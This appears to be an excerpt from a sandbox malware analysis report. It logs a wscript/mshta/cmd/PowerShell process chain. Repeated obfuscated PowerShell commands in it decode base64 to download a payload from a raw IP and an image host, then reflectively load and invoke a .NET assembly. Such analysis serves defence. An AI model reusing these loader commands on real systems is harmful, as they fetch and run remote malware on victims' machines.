invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgngt0hoanfqbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagiefkzc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tzu1czvjkzuzjtmluau9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbszwfguuh5zyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvhh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbstu0sdwludcagicagicagicagicagicagicagicagicagicagicagicbltw52behrb3assw50uhryicagicagicagicagicagicagicagicagicagicagicagigtmymv1bvipoycgicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicagimdodyigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdrsagicagicagicagicagicagicagicagicagicagicagicbmvxrkqlygicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaky0zpse5qcvbsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xndiunjavndy2l2tpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlc3rmb3jtzs50suyilcikru52okfquerbvefca2lkc25py2vmb3jtzxrvz2v0ymfja2dyzwf0dghpbmdzd2l0ag5ldgllcnrpbwvnaxzlbm1lymvzlnziuyismcwwktttdefsdc1ztgvfccgzkttjblzvs0utrxhqukvtc2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxgtpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlcy52ylmi'+[char]0x22+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $portioned = 'jhbyzw9idgfpbnmgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskbgfsbhlnywdnaw5nid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskdgf1bnrpbmdsesa9icrsywxsewdhz2dpbmcurg93bmxvywreyxrhkcrwcmvvynrhaw5zktskbm9udmlyz2lucya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcr0yxvudgluz2x5ktskbmv3c21lbia9icc8pejbu0u2nf9tvefsvd4+jzskc3bpcml0dwfsaxn0awmgpsanpdxcqvnfnjrfru5epj4noyrhc2fmb2v0awrhcya9icrub252axjnaw5zlkluzgv4t2yojg5ld3ntzw4poyrzbm9vemugpsakbm9udmlyz2lucy5jbmrlee9mkcrzcglyaxr1ywxpc3rpyyk7jgfzywzvzxrpzgfzic1nzsawic1hbmqgjhnub296zsatz3qgjgfzywzvzxrpzgfzoyrhc2fmb2v0awrhcyarpsakbmv3c21lbi5mzw5ndgg7jg95zxmgpsakc25vb3plic0gjgfzywzvzxrpzgfzoyrzdglsbgluzya9icrub252axjnaw5zlln1ynn0cmluzygkyxnhzm9ldglkyxmsicrvewvzktskag9sbg93bmvzc2vzid0glwpvaw4gkcrzdglsbgluzy5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkc3rpbgxpbmcutgvuz3rokv07jgnvbgvzbgf3cya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghvbgxvd25lc3nlcyk7jg1hbmfnzw1lbnrzid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgky29szxnsyxdzktskamv3zmlzaca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrqzxdmaxnolkludm9rzsgkbnvsbcwgqcgnmc9uq3gzmc9yl2vllmv0c2fwly86c3b0dggnlcanjgzvcmvizwfyjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcanq2fzug9sjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlccxjywnjgzvcmvizwfyjykpow==';$reprovals = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($portioned));invoke-expression $reprovals
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgngt0hoanfqbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagiefkzc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tzu1czvjkzuzjtmluau9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbszwfguuh5zyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvhh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbstu0sdwludcagicagicagicagicagicagicagicagicagicagicagicbltw52behrb3assw50uhryicagicagicagicagicagicagicagicagicagicagicagigtmymv1bvipoycgicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicagimdodyigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdrsagicagicagicagicagicagicagicagicagicagicagicbmvxrkqlygicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaky0zpse5qcvbsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xndiunjavndy2l2tpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlc3rmb3jtzs50suyilcikru52okfquerbvefca2lkc25py2vmb3jtzxrvz2v0ymfja2dyzwf0dghpbmdzd2l0ag5ldgllcnrpbwvnaxzlbm1lymvzlnziuyismcwwktttdefsdc1ztgvfccgzkttjblzvs0utrxhqukvtc2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxgtpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlcy52ylmi'+[char]0x22+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgngt0hoanfqbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagiefkzc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tzu1czvjkzuzjtmluau9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbszwfguuh5zyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvhh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbstu0sdwludcagicagicagicagicagicagicagicagicagicagicagicbltw52behrb3assw50uhryicagicagicagicagicagicagicagicagicagicagicagigtmymv1bvipoycgicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicagimdodyigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdrsagicagicagicagicagicagicagicagicagicagicagicbmvxrkqlygicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaky0zpse5qcvbsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xndiunjavndy2l2tpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlc3rmb3jtzs50suyilcikru52okfquerbvefca2lkc25py2vmb3jtzxrvz2v0ymfja2dyzwf0dghpbmdzd2l0ag5ldgllcnrpbwvnaxzlbm1lymvzlnziuyismcwwktttdefsdc1ztgvfccgzkttjblzvs0utrxhqukvtc2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxgtpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlcy52ylmi'+[char]0x22+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $portioned = 'jhbyzw9idgfpbnmgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskbgfsbhlnywdnaw5nid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskdgf1bnrpbmdsesa9icrsywxsewdhz2dpbmcurg93bmxvywreyxrhkcrwcmvvynrhaw5zktskbm9udmlyz2lucya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcr0yxvudgluz2x5ktskbmv3c21lbia9icc8pejbu0u2nf9tvefsvd4+jzskc3bpcml0dwfsaxn0awmgpsanpdxcqvnfnjrfru5epj4noyrhc2fmb2v0awrhcya9icrub252axjnaw5zlkluzgv4t2yojg5ld3ntzw4poyrzbm9vemugpsakbm9udmlyz2lucy5jbmrlee9mkcrzcglyaxr1ywxpc3rpyyk7jgfzywzvzxrpzgfzic1nzsawic1hbmqgjhnub296zsatz3qgjgfzywzvzxrpzgfzoyrhc2fmb2v0awrhcyarpsakbmv3c21lbi5mzw5ndgg7jg95zxmgpsakc25vb3plic0gjgfzywzvzxrpzgfzoyrzdglsbgluzya9icrub252axjnaw5zlln1ynn0cmluzygkyxnhzm9ldglkyxmsicrvewvzktskag9sbg93bmvzc2vzid0glwpvaw4gkcrzdglsbgluzy5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkc3rpbgxpbmcutgvuz3rokv07jgnvbgvzbgf3cya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghvbgxvd25lc3nlcyk7jg1hbmfnzw1lbnrzid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgky29szxnsyxdzktskamv3zmlzaca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrqzxdmaxnolkludm9rzsgkbnvsbcwgqcgnmc9uq3gzmc9yl2vllmv0c2fwly86c3b0dggnlcanjgzvcmvizwfyjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcanq2fzug9sjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlccxjywnjgzvcmvizwfyjykpow==';$reprovals = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($portioned));invoke-expression $reprovals
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgngt0hoanfqbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagiefkzc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tzu1czvjkzuzjtmluau9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbszwfguuh5zyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvhh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbstu0sdwludcagicagicagicagicagicagicagicagicagicagicagicbltw52behrb3assw50uhryicagicagicagicagicagicagicagicagicagicagicagigtmymv1bvipoycgicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicagimdodyigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdrsagicagicagicagicagicagicagicagicagicagicagicbmvxrkqlygicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaky0zpse5qcvbsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xndiunjavndy2l2tpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlc3rmb3jtzs50suyilcikru52okfquerbvefca2lkc25py2vmb3jtzxrvz2v0ymfja2dyzwf0dghpbmdzd2l0ag5ldgllcnrpbwvnaxzlbm1lymvzlnziuyismcwwktttdefsdc1ztgvfccgzkttjblzvs0utrxhqukvtc2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxgtpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlcy52ylmi'+[char]0x22+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgngt0hoanfqbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagiefkzc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tzu1czvjkzuzjtmluau9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbszwfguuh5zyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvhh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbstu0sdwludcagicagicagicagicagicagicagicagicagicagicagicbltw52behrb3assw50uhryicagicagicagicagicagicagicagicagicagicagicagigtmymv1bvipoycgicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicagimdodyigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdrsagicagicagicagicagicagicagicagicagicagicagicbmvxrkqlygicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaky0zpse5qcvbsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xndiunjavndy2l2tpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlc3rmb3jtzs50suyilcikru52okfquerbvefca2lkc25py2vmb3jtzxrvz2v0ymfja2dyzwf0dghpbmdzd2l0ag5ldgllcnrpbwvnaxzlbm1lymvzlnziuyismcwwktttdefsdc1ztgvfccgzkttjblzvs0utrxhqukvtc2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxgtpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlcy52ylmi'+[char]0x22+'))')))"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $portioned = 'jhbyzw9idgfpbnmgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskbgfsbhlnywdnaw5nid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskdgf1bnrpbmdsesa9icrsywxsewdhz2dpbmcurg93bmxvywreyxrhkcrwcmvvynrhaw5zktskbm9udmlyz2lucya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcr0yxvudgluz2x5ktskbmv3c21lbia9icc8pejbu0u2nf9tvefsvd4+jzskc3bpcml0dwfsaxn0awmgpsanpdxcqvnfnjrfru5epj4noyrhc2fmb2v0awrhcya9icrub252axjnaw5zlkluzgv4t2yojg5ld3ntzw4poyrzbm9vemugpsakbm9udmlyz2lucy5jbmrlee9mkcrzcglyaxr1ywxpc3rpyyk7jgfzywzvzxrpzgfzic1nzsawic1hbmqgjhnub296zsatz3qgjgfzywzvzxrpzgfzoyrhc2fmb2v0awrhcyarpsakbmv3c21lbi5mzw5ndgg7jg95zxmgpsakc25vb3plic0gjgfzywzvzxrpzgfzoyrzdglsbgluzya9icrub252axjnaw5zlln1ynn0cmluzygkyxnhzm9ldglkyxmsicrvewvzktskag9sbg93bmvzc2vzid0glwpvaw4gkcrzdglsbgluzy5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkc3rpbgxpbmcutgvuz3rokv07jgnvbgvzbgf3cya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghvbgxvd25lc3nlcyk7jg1hbmfnzw1lbnrzid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgky29szxnsyxdzktskamv3zmlzaca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrqzxdmaxnolkludm9rzsgkbnvsbcwgqcgnmc9uq3gzmc9yl2vllmv0c2fwly86c3b0dggnlcanjgzvcmvizwfyjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcanq2fzug9sjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlccxjywnjgzvcmvizwfyjykpow==';$reprovals = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($portioned));invoke-expression $reprovalsJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgngt0hoanfqbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagiefkzc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tzu1czvjkzuzjtmluau9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbszwfguuh5zyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvhh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbstu0sdwludcagicagicagicagicagicagicagicagicagicagicagicbltw52behrb3assw50uhryicagicagicagicagicagicagicagicagicagicagicagigtmymv1bvipoycgicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicagimdodyigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdrsagicagicagicagicagicagicagicagicagicagicagicbmvxrkqlygicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaky0zpse5qcvbsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xndiunjavndy2l2tpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlc3rmb3jtzs50suyilcikru52okfquerbvefca2lkc25py2vmb3jtzxrvz2v0ymfja2dyzwf0dghpbmdzd2l0ag5ldgllcnrpbwvnaxzlbm1lymvzlnziuyismcwwktttdefsdc1ztgvfccgzkttjblzvs0utrxhqukvtc2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxgtpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlcy52ylmi'+[char]0x22+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgngt0hoanfqbcagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagiefkzc1uexblicagicagicagicagicagicagicagicagicagicagicagic1tzu1czvjkzuzjtmluau9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxnt24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbszwfguuh5zyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvhh0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbstu0sdwludcagicagicagicagicagicagicagicagicagicagicagicbltw52behrb3assw50uhryicagicagicagicagicagicagicagicagicagicagicagigtmymv1bvipoycgicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicagimdodyigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdrsagicagicagicagicagicagicagicagicagicagicagicbmvxrkqlygicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaky0zpse5qcvbsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xndiunjavndy2l2tpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlc3rmb3jtzs50suyilcikru52okfquerbvefca2lkc25py2vmb3jtzxrvz2v0ymfja2dyzwf0dghpbmdzd2l0ag5ldgllcnrpbwvnaxzlbm1lymvzlnziuyismcwwktttdefsdc1ztgvfccgzkttjblzvs0utrxhqukvtc2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvovjpbufbeqvrbxgtpzhnuawnlzm9ybwv0b2dldgjhy2tncmvhdhroaw5nc3dpdghuzxrpzxj0aw1lz2l2zw5tzwjlcy52ylmi'+[char]0x22+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $portioned = 'jhbyzw9idgfpbnmgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskbgfsbhlnywdnaw5nid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskdgf1bnrpbmdsesa9icrsywxsewdhz2dpbmcurg93bmxvywreyxrhkcrwcmvvynrhaw5zktskbm9udmlyz2lucya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcr0yxvudgluz2x5ktskbmv3c21lbia9icc8pejbu0u2nf9tvefsvd4+jzskc3bpcml0dwfsaxn0awmgpsanpdxcqvnfnjrfru5epj4noyrhc2fmb2v0awrhcya9icrub252axjnaw5zlkluzgv4t2yojg5ld3ntzw4poyrzbm9vemugpsakbm9udmlyz2lucy5jbmrlee9mkcrzcglyaxr1ywxpc3rpyyk7jgfzywzvzxrpzgfzic1nzsawic1hbmqgjhnub296zsatz3qgjgfzywzvzxrpzgfzoyrhc2fmb2v0awrhcyarpsakbmv3c21lbi5mzw5ndgg7jg95zxmgpsakc25vb3plic0gjgfzywzvzxrpzgfzoyrzdglsbgluzya9icrub252axjnaw5zlln1ynn0cmluzygkyxnhzm9ldglkyxmsicrvewvzktskag9sbg93bmvzc2vzid0glwpvaw4gkcrzdglsbgluzy5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkc3rpbgxpbmcutgvuz3rokv07jgnvbgvzbgf3cya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghvbgxvd25lc3nlcyk7jg1hbmfnzw1lbnrzid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgky29szxnsyxdzktskamv3zmlzaca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrqzxdmaxnolkludm9rzsgkbnvsbcwgqcgnmc9uq3gzmc9yl2vllmv0c2fwly86c3b0dggnlcanjgzvcmvizwfyjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcanq2fzug9sjywgjyrmb3jlymvhcicsicckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlcckzm9yzwjlyxinlccxjywnjgzvcmvizwfyjykpow==';$reprovals = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($portioned));invoke-expression $reprovals
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
